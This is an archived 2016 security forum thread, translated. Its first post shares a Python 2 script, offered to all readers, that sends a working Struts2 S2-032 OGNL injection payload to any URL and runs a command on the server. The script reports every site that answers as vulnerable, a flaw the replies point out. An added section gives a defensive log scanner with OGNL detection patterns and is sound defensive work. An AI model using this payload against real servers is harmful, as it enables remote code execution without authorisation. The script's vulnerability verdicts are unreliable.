Silic Group Forum Archive - Silic Security
[Script] Simple S2-032 self-check script

cold (The user has been deleted)
Posted 2016-5-2 23:16:19
Over the last two days every major vulnerability platform has been flooded with the Struts2 command execution vulnerability. There is all kinds of exploit code online, but everything I saw was quite complicated, so I simply wrote a Python script for everyone to test with!

This script is for security testing only and must not be used for illegal purposes; otherwise you bear the consequences yourself!

#! /usr/bin/env python
# coding:utf-8
# Python 2 script (print statements, urllib.urlopen, raw_input).

##############################################
#
# Simple S2-032 self-check script V1.0
#
# 20160428 V1.0
#
# By:EvillenG    QQ:2264672229
#
##############################################

import urllib
import sys

print
print "简易版S2-032自查脚本 V1.0 By:EvillenG"
print
print "本脚本仅用于安全测试,不得用于非法用途,否则自负!"
print


def getHtml(url):
    # Fetch the URL and return the response body to the caller.
    req = urllib.urlopen(url)
    data = req.read()
    return data


def main():
    try:
        comm = raw_input("URL:")
        # Appends the S2-032 test request as a query string to the URL the user typed.
        get_exp = comm + "?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@[email protected]().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8"
        targetHtml = getHtml(get_exp)

        # The response body is printed unchanged for the user to inspect.
        print targetHtml
        print
        # Reached whenever the request completed, whatever the response contained.
        print "此网站存在Struts2命令执行漏洞,请尽快打补丁,谢谢!"
        print
    except:
        # Any exception (connection failure, malformed URL) lands here;
        # urllib.urlopen does not raise on HTTP error status codes.
        print
        print "此网站不存在Struts2命令执行漏洞,请放心使用,谢谢!"
        print


if __name__ == '__main__':
    main()
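The defender-side counterpart to the script above, added here as an example that is not part of the original post or of EvillenG's script: a scan over web server access logs that flags S2-032-style probes. The request the script sends is recognisable in logs by its `method:` parameter prefix (Struts2 dynamic method invocation) followed by OGNL markers such as `#_memberAccess` and `@Class@member` static calls, all percent-encoded. The log lines below are constructed samples in Apache/nginx combined format, not real traffic; the decoding is applied twice so single- and double-encoded queries are both caught. A plain `method:login` request is not flagged, because dynamic method invocation on its own is legitimate application behaviour.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (Apache/nginx "combined" format). Lines 1 and 2 are
# S2-032 style probes (line 2 is double-encoded); lines 3 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [02/May/2016:23:20:01 +0800] "GET /app/index.action?method:%23_memberAccess%3d%23xx&cmd=whoami HTTP/1.1" 200 512 "-" "python-urllib/2.7"
198.51.100.7 - - [02/May/2016:23:21:44 +0800] "GET /index.action?method%3A%2523_memberAccess%253D1%2C%2540org.apache.struts2.ServletActionContext%2540getResponse() HTTP/1.1" 500 1024 "-" "curl/7.47.0"
192.0.2.9 - - [02/May/2016:23:22:10 +0800] "GET /index.action?method:login&user=bob HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [02/May/2016:23:22:11 +0800] "GET /static/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# OGNL markers that appear in the decoded query of an S2-032 style request.
OGNL_MARKERS = {
    "_memberAccess": re.compile(r"#_memberAccess"),
    "static_call": re.compile(r"@[\w.]+@\w+"),          # @pkg.Class@member
    "struts_ctx": re.compile(r"ServletActionContext"),
    "runtime_exec": re.compile(r"getRuntime\(\)|\.exec\("),
}


def decode_query(target):
    """Return the query string of a request target, percent-decoded twice so
    that single- and double-encoded payloads both become readable."""
    query = urlsplit(target).query
    return unquote(unquote(query))


def find_s2032_indicators(target):
    """Return the names of OGNL markers found in a request target.

    The 'method:' parameter prefix is required before any marker counts:
    the markers alone also appear in payloads for other Struts2 advisories,
    and the prefix alone is legitimate dynamic method invocation."""
    query = decode_query(target)
    if not re.search(r"(^|&)method:", query):
        return []
    return [name for name, rx in OGNL_MARKERS.items() if rx.search(query)]


def scan_log(text):
    """Parse combined-format log text and return one dict per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        indicators = find_s2032_indicators(m["target"])
        if indicators:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "target": m["target"],
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["indicators"]))
```

The status code is kept in each hit on purpose: an S2-032 probe that came back 200 deserves a closer look at the response size and at what the application did, while a 500 usually means the expression failed to evaluate, which is still worth an alert because it records who is scanning.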

oyeahtime (The user has been deleted)
Posted 2016-5-3 11:21:28
The false positive rate is pretty bad.
Evilys (The user has been deleted)
Posted 2016-5-4 19:19:00
It doesn't check the response packet.